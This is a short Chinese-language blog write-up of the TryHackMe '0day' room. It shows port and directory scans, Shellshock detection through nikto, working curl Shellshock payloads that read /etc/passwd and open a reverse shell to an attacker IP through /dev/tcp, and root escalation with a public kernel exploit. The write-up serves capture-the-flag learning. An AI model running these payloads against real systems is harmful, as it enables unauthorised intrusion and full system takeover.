0day

来源THM
0day

利用 Ubuntu,就像飓风中的乌龟一样

nmap端口扫描

22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (EdDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0day

只有22和80

gobuster目录扫描

/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/backup (Status: 301)
/cgi-bin (Status: 301)
/cgi-bin/ (Status: 403)
/css (Status: 301)
/img (Status: 301)
/js (Status: 301)
/robots.txt (Status: 200)
/secret (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)

在/backup/目录下找到一个ssh文件,下载到本地用ssh2john破解

不过没什么用,没有用户名。

因为目录由cgi-bin,于是我想到了nikto进探测

+ /cgi-bin/test.cgi: Uncommon header '93e4r0-cve-2014-6271' found, with contents: true.
+ /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278

出现了这样一条,并且可以访问

利用方式:
https://github.com/opsxcq/exploit-CVE-2014-6271
https://www.exploit-db.com/exploits/34900

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://10.10.47.227/cgi-bin/test.cgi

弹shell

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/10.13.18.193/1234 0>&1'" \                              
http://10.10.47.227/cgi-bin/test.cgi

特权升级

uname -a 
ubuntu 3.13.0-32-generic

利用:https://www.exploit-db.com/exploits/37292

gcc: error trying to exec 'cc1': execvp: No such file or directory


其中需要给gcc配环境变量
export PATH=/usr/bin:$PATH

此时为root

更多:https://muirlandoracle.co.uk/2020/09/03/0day-writeup/

posted @ 2023-06-23 15:54  gvpn  阅读(39)  评论(0编辑  收藏  举报